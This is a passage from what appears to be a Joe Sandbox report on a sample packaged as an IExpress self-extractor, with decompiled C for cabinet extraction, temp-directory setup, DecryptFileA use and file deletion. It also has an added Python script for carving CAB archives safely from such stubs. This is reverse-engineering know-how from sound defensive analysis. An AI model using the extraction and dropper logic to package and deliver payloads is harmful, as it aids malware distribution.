    _t9 = *0x178584; // 0x0
    if(_t9 != 0) {
        ShowWindow(GetDlgItem(_t9, 0x842), 0);
        ShowWindow(GetDlgItem(*0x178584, 0x841), 5);
    }
    _t10 = E00174EFD(0, 0);
    if(_t10 != 0) {
        // ordinal import; given the "*MEMCAB" usage below this is likely cabinet.dll FDICreate
        // (seven callbacks, CPU type, error struct at 0x179148) - ordinal mapping is an assumption
        __imp__#20(E00174CA0, E00174CC0, E00174980, E00174A50, E00174AD0, E00174B60, E00174BC0, 1, 0x179148, _t33);
        _t34 = _t10;
        if(_t34 == 0) {
            L8:
            _t29 = *0x179148; // 0x0
            _t24 = *0x178584; // 0x0
            E001744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
            _t37 = 0;
            L9:
            goto L10;
        }
        // likely FDICopy: walks the in-memory cabinet, E00174CD0 receives the extraction notifications
        __imp__#22(_t34, "*MEMCAB", 0x171140, 0, E00174CD0, 0, 0x179140); // executed
        _t37 = _t10;
        if(_t37 == 0) {
            goto L9;
        }
        __imp__#23(_t34); // executed (likely FDIDestroy)
        if(_t10 != 0) {
            goto L9;
        }
        goto L8;
    } else {
        _t27 = *0x178584; // 0x0
        E001744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
        _t37 = 0;
        L10:
        _t12 = *0x179140; // 0x0
        if(_t12 != 0) {
            FreeResource(_t12);
            *0x179140 = 0;
        }
        if(_t37 == 0) {
            _t47 = *0x1791d8; // 0x0
            if(_t47 == 0) {
                E001744B9(0, 0x4f8, 0, 0, 0x10, 0);
            }
        }
        if((*0x178a38 & 0x00000001) == 0 && (*0x179a34 & 0x00000001) == 0) {
            SendMessageA(*0x178584, 0xfa1, _t37, 0);
        }
        return _t37;
    }
}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00174FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00175006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0017500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00175030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00175037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0017504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00175051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00175111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00175159
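The API list above shows the stub opening an RT_RCDATA (type 0x0A) resource named CABINET, locking it and handing the bytes to its cabinet decoder (the *MEMCAB string is the name wextract-style stubs give that in-memory cabinet), and the C code below changes into the IXP000.TMP extraction directory; together these are the markers of a wextract/IExpress self-extracting package, so the next stage can be recovered by carving the cabinet out of the stub instead of detonating it. The Python below is an added example for this page, not Joe Sandbox or sample code: it scans a blob for the MSCF header, validates the fixed CFHEADER fields, lists the CFFILE entries, and flags a cabinet whose declared size runs past the end of the container (what a partial memory dump looks like). The stub bytes and file names it uses are constructed test data, and the UTF-16 resource-name scan is a cheap heuristic rather than a walk of the PE resource directory.

```python
"""Carve Microsoft cabinet (CAB) archives out of a self-extracting stub and
list the files each cabinet declares, without executing the stub.
Added example for this report, not Joe Sandbox or sample code; the fixed
CFHEADER / CFFOLDER / CFFILE layouts follow the public MS-CAB format."""
import struct

CAB_MAGIC = b"MSCF"
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # 36-byte fixed CFHEADER
CFFOLDER = struct.Struct("<IHH")             # coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")            # cbFile, uoffFolderStart, iFolder, date, time, attribs
NAME_IS_UTF = 0x80                           # CFFILE.attribs bit: szName is UTF-8
# RT_RCDATA names the stub opens in the report; a PE resource directory stores them as UTF-16LE
IEXPRESS_RESOURCE_NAMES = ("CABINET", "TITLE")


def parse_cfheader(buf, off=0):
    """Return the CFHEADER fields at buf[off:], or None if not a plausible cabinet."""
    if buf[off:off + 4] != CAB_MAGIC or len(buf) - off < CFHEADER.size:
        return None
    (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, set_id, i_cabinet) = CFHEADER.unpack_from(buf, off)
    if (ver_major, ver_minor) != (1, 3):               # the only cabinet format version in use
        return None
    if not CFHEADER.size <= coff_files < cb_cabinet:   # CFFILE table must lie inside the cab
        return None
    return {"cb_cabinet": cb_cabinet, "coff_files": coff_files, "c_folders": c_folders,
            "c_files": c_files, "flags": flags, "set_id": set_id, "i_cabinet": i_cabinet}


def list_cffiles(buf, cab_off, hdr):
    """Walk the CFFILE table; return [(name, size, folder_index, attribs)].
    Stops quietly at the first entry that runs past the available bytes."""
    entries = []
    pos = cab_off + hdr["coff_files"]
    end = min(len(buf), cab_off + hdr["cb_cabinet"])
    for _ in range(hdr["c_files"]):
        if pos + CFFILE.size > end:
            break
        cb_file, _uoff, i_folder, _date, _time, attribs = CFFILE.unpack_from(buf, pos)
        pos += CFFILE.size
        nul = buf.find(b"\x00", pos, end)
        if nul < 0:
            break
        codec = "utf-8" if attribs & NAME_IS_UTF else "cp1252"
        entries.append((buf[pos:nul].decode(codec, "replace"), cb_file, i_folder, attribs))
        pos = nul + 1
    return entries


def carve_cabs(blob):
    """Describe every embedded cabinet; 'truncated' marks one whose declared
    cbCabinet runs past the end of the container (e.g. a partial memory dump)."""
    found = []
    off = blob.find(CAB_MAGIC)
    while off >= 0:
        hdr = parse_cfheader(blob, off)
        if hdr is not None:
            found.append({"offset": off, "declared_size": hdr["cb_cabinet"],
                          "truncated": off + hdr["cb_cabinet"] > len(blob),
                          "files": list_cffiles(blob, off, hdr),
                          "data": blob[off:off + hdr["cb_cabinet"]]})
        off = blob.find(CAB_MAGIC, off + 4)
    return found


def iexpress_markers(blob):
    """Cheap triage heuristic: which of the stub's resource names occur as UTF-16LE strings."""
    return [n for n in IEXPRESS_RESOURCE_NAMES if n.encode("utf-16-le") in blob]


def build_sample_cab(names, trailing=b""):
    """Construct a minimal store-only cabinet declaring `names` (test data, not from the sample)."""
    cffiles, uoff = b"", 0
    for i, n in enumerate(names):
        size = 0x100 * (i + 1)
        cffiles += CFFILE.pack(size, uoff, 0, 0x5643, 0x4A2B, 0x20) + n.encode() + b"\x00"
        uoff += size
    coff_files = CFHEADER.size + CFFOLDER.size                 # one CFFOLDER right after the header
    cb_cabinet = coff_files + len(cffiles) + len(trailing)
    cffolder = CFFOLDER.pack(coff_files + len(cffiles), 0, 0)  # no CFDATA blocks, typeCompress=none
    header = CFHEADER.pack(CAB_MAGIC, 0, cb_cabinet, 0, coff_files, 0, 3, 1,
                           1, len(names), 0, 0x1234, 0)
    return header + cffolder + cffiles + trailing


# Constructed stand-in for an extractor stub: PE-style prefix, a UTF-16 resource name, the cab, padding.
SAMPLE_CAB = build_sample_cab(["inner.exe", "setup.inf"], b"\x00" * 32)
SAMPLE_STUB = b"MZ" + b"\x00" * 120 + "CABINET".encode("utf-16-le") + SAMPLE_CAB + b"\x00" * 16
# The same stub cut off inside the CFFILE table, as a partial dump would be.
TRUNCATED_STUB = SAMPLE_STUB[: SAMPLE_STUB.find(b"setup.inf") + 3]

if __name__ == "__main__":
    for cab in carve_cabs(SAMPLE_STUB) + carve_cabs(TRUNCATED_STUB):
        print(cab["offset"], cab["declared_size"], cab["truncated"], cab["files"])
```

On a real stub, write each `data` slice to disk and expand it with `expand.exe` or `cabextract`; a `truncated` hit on a memory dump means the dump has to be redone from the file on disk, since the CFFILE table alone will not recover the payload.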
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: cc57e4f791bc5e41ba0fa217f2fa2b893493be0a94921c95df0af8dad5393cb5
                                                                                                                                                                                                    • Instruction ID: 5aba7bde3a8eb0b848b78d97e06beddb03913494f42eb23bb639dec5ffde1e3a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc57e4f791bc5e41ba0fa217f2fa2b893493be0a94921c95df0af8dad5393cb5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331C8B0780701BFE7205B61AD8DF6B377DBB44756F848424F90EA29A1DBF48CC08661
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                     • Rendered graph not reproduced. Basic blocks of E00172F1D (172f1d-1730b7) that call Win32 APIs or named subroutines, in address order:
                                                                                                                                                                                                     • 172f48: call 1751e5
                                                                                                                                                                                                     • 172f5f-172f66: call 173a3f
                                                                                                                                                                                                     • 172f6c-172f73: call 175164
                                                                                                                                                                                                     • 172f79-172f80: call 1755a0
                                                                                                                                                                                                     • 172f86-172fbe: GetSystemDirectoryA, call 17658a, LoadLibraryA
                                                                                                                                                                                                     • 172fc0-172fd4: GetProcAddress
                                                                                                                                                                                                     • 172fd6-172fee: DecryptFileA
                                                                                                                                                                                                     • 172ff7-173004: FreeLibrary
                                                                                                                                                                                                     • 17300e: call 17621e
                                                                                                                                                                                                     • 173017-173024: SetCurrentDirectoryA
                                                                                                                                                                                                     • 173026-17303c: call 1744b9, call 176285
                                                                                                                                                                                                     • 173043-173053: call 176ce0
                                                                                                                                                                                                     • 17305c: call 173b26
                                                                                                                                                                                                     • 17306e-173075: call 17256d
                                                                                                                                                                                                     • 173093: call 173ba2
                                                                                                                                                                                                     • 1730af: call 174169
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00172F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                    				_t9 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                    				if( *0x178a38 != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t11 = E00175164(_t52);
                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						return E00176CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t14 = E001755A0(_t53); // executed
                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                    						E0017658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0x17a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0x178a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0x178a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0x178d48 & 0x000000c0;
									if(( *0x178d48 & 0x000000c0) == 0) {
										_t41 =  *0x179a40; // 0x3, executed
										_t26 = E0017256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x178a24; // 0x0
									 *0x179a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x178a38;
										if( *0x178a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00174169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x179a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00173BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x178a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00173B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E001744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x179124 = E00176285();
							goto L16;
						}
						_t59 =  *0x179a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0017621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x178a24;
				if( *0x178a24 != 0) {
					L4:
					_t34 = E00173A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E001751E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x178a38;
				if( *0x178a38 != 0) {
					goto L5;
				}
				goto L4;
			}
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017300e
                                                                                                                                                                                                    0x00173015
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173015
                                                                                                                                                                                                    0x00172f80
                                                                                                                                                                                                    0x00172f3f
                                                                                                                                                                                                    0x00172f46
                                                                                                                                                                                                    0x00172f5f
                                                                                                                                                                                                    0x00172f5f
                                                                                                                                                                                                    0x00172f64
                                                                                                                                                                                                    0x00172f66
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f66
                                                                                                                                                                                                    0x00172f4f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f55
                                                                                                                                                                                                    0x00172f5d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00172F93
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00172FB2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00172FC6
                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00172FE6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00172FF8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017301C
                                                                                                                                                                                                      • Part of subcall function 001751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00172F4D,?,00000002,00000000), ref: 00175201
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-58291647
                                                                                                                                                                                                    • Opcode ID: 2054fcae1ca39312c80c3510bdc0e9e62166467820ff6d0dcbe2226687af7f41
                                                                                                                                                                                                    • Instruction ID: 08344e80bb0be4decdcf0e34814f5e5226b40a317a9328cda820042b8cb4a411
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2054fcae1ca39312c80c3510bdc0e9e62166467820ff6d0dcbe2226687af7f41
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50410030A402159BDB30AB35AC49A6A33B8EBA5751F10C165F81DC3991EFB4CFC5DA61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00175467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0x1791e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00171680(0x1791e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E001758C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0x179124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00176CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E0017597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0x178a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0x178a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0x179124 = E00176285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x178a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E001753A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0x1791e4;
                                                                                                                                                                                                    				E00171781(0x1791e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0x179a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E0017658A(_t48, 0x104, 0x171140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E0017658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001754C9
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017553D
                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017556F
                                                                                                                                                                                                      • Part of subcall function 001753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001753FB
                                                                                                                                                                                                      • Part of subcall function 001753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175402
                                                                                                                                                                                                      • Part of subcall function 001753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017541F
                                                                                                                                                                                                      • Part of subcall function 001753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017542B
                                                                                                                                                                                                      • Part of subcall function 001753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175434
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-186922987
                                                                                                                                                                                                    • Opcode ID: 8b4ccd812aed76a66bac7ae828ed2697984dee87c6e9f4b258290b8aa5da4814
                                                                                                                                                                                                    • Instruction ID: e323a2d09cd7fe3c9bb6a016fe493df675b28b7c3d98dbd05d73e9b0df285f8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b4ccd812aed76a66bac7ae828ed2697984dee87c6e9f4b258290b8aa5da4814
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39313671B40A156BCB14AF399D4997E77BBABD1350B44C13AB80ED3990DBF0CE818691
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00172390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				// Decompiled directory-wipe routine: __ecx names a directory; every file in it is
				// deleted, subdirectories are handled recursively, then the directory itself is removed.
				_t69 = (_t67 & 0xfffffff8) - 0x254;
